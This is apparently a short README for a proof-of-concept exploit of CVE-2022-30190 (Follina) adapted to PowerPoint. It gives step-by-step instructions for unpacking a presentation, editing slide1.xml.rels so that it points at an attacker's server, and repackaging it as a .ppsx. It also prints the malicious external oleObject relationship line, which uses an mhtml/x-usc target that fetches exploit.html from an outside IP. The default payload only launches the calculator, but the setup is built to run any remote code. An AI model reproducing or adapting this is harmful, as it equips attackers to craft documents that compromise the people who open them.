CVE-2022-30190(Follina)-PowerPoint-Version
This is CVE-2022-30190(follina) on powerpoint version
Modify the suffix of the file to 'pptx' and unzip the file, you can edit \ppt\slides\_rels\slide1.xml.rels and replace to your vps ip:port like this, then compress them as the same way and change the suffix to 'ppsx'. The default payload is to execute the calc.
<Relationship TargetMode="External" Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://114.114.114.114:80/exploit.html!x-usc:http://114.114.114.114:80/exploit.html"/>